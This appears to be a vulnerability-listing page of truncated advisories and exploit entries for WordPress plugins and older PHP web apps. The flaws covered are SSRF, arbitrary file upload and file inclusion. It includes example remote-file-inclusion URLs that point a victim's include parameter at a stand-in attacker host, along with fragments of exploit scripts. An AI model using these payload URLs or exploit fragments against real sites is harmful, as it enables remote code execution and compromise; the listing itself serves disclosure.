CVE-2026-0746

CVE-2026-0746 : The WordPress AI Engine plugin (

CVE-2026-0746 AI Engine <= 3.3.2 - Authenticated (Subscriber+) Server-Side Request Forgery

The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.3.2 via the 'getaudio' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations...

CVE-2026-0746

The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.3.2 via the 'getaudio' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations...

EUVD-2025-204668

The Redirection for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'movefiletoupload' function in all versions up to, and including, 3.2.7. This makes it possible for unauthenticated attackers to copy arbitrary files on the...

PT-2025-52586

Name of the Vulnerable Software and Affected Versions Contact Form 7 Redirection plugin for WordPress versions up to and including 3.2.7 Description The plugin is susceptible to arbitrary file uploads because of a lack of file type validation within the move file to upload function. This allows...

CVE-2025-12496 Zephyr Project Manager <= 3.3.203 - Authenticated (Custom+) Arbitrary File Read And Server-Side Request Forgery

The Zephyr Project Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.203 via the file parameter. This makes it possible for authenticated attackers, with Custom-level access and above, to read the contents of arbitrary files on the server,...

CVE-2025-12352

The CVE-2025-12352 issue affects the WordPress Gravity Forms plugin, specifically versions up to and including 2.9.20. The vulnerability arises from missing file type validation in the copy_post_image() function, allowing unauthenticated attackers to upload arbitrary files to the affected site’s ...

CVE-2025-12352 Gravity Forms <= 2.9.20 - Unauthenticated Arbitrary File Upload via 'copy_post_image'

The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the copypostimage function in all versions up to, and including, 2.9.20. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's serv...

EUVD-2002-1418

Malware in sbrugna...

phpWebLog <= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability

No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ posdubatgmail.com 2012-06-27 webERP = 4.08.1 Local/Remote File Inclusion Vulnerability Script: Accounting & Best...

Поиск уязвимостей в веб приложениях

В этой статье я собрал интересные на мой взгляд ошибки в php скриптах. Но для начала, описание некоторых параметров PHP-интерпретатора: Цитата: registerglobals = ON - все переменные регистрируются как глобальные; magicquotesgpc = ON - в массивах POST, GET, COOKIE экранируются кавычки и опасные...

School Data Navigator (page) Local/Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ====================================================================== School Data Navigator page Local/Remote File Inclusion Vulnerability ======================================================================...

Podcast Generator 1.2 - &#039;GLOBALS[]&#039; Multiple Vulnerabilities

++ | Podcast Generator RFI | | | magicquotesgpc=off -- LFI | +-------------------------+-----------------------------------------------------------+ | delete.php?GLOBALSamilogged=true&file&GLOBALSabsoluteurl= | | admin.php?p=admin&GLOBALSabsoluteurl= | |...

Coppermine Photo Gallery 1.4.19 File Upload

Written By Michael Brooks Special thanks to str0ke! Coppermine Photo gallery - Remote PHP File Upload Affects: v1.4.19 Homepage: http://coppermine-gallery.net/ 5,239,057 downloads from sf.net! For this attack we need registerglobals=on . The problem is that the anti-registerglobals security can b...

sendcard_340_xpl.txt

!/usr/bin/php -q -d shortopentag=on php injection\n"; echo " works against magicquotesgpc=Off\n"; echo " 2 - arbitrary remote inclusion\n"; echo " works against allowurlfopen=On\n"; echo " 3 - arbitrary local inclusion\n"; echo " works regardless of php.ini settings\n"; echo " and if you succeed ...

DotClear <= 1.2.4 (prepend.php) Arbitrary Remote Inclusion Exploit

Exploit for unknown platform in category web applications ================================================================== DotClear = 1.2.4 prepend.php Arbitrary Remote Inclusion Exploit ================================================================== !/usr/bin/php -q -d shortopentag=on ? ech...

Activity MOD Plus 1.1.0 - &#039;phpBB Mod&#039; File Inclusion

phpBB 2.x Activity MOD Plus File Inclusion Vulnerability Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on phpBB 2.x Activity MOD Plus Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 Succesful exploitation needs registerglobals on GET ...

Nucleus CMS 3.22 - &#039;DIR_LIBS&#039; Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on \r\n"; die...

sphider_13_xpl_pl.txt

!/usr/bin/perl use IO::Socket; print "\r\nSphider works with registerglobals = On & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n"; print "\r\ndork: "powered by sphider"\r\n"; sub main::urlEncode my $string = @; $string = s/\W/"%"...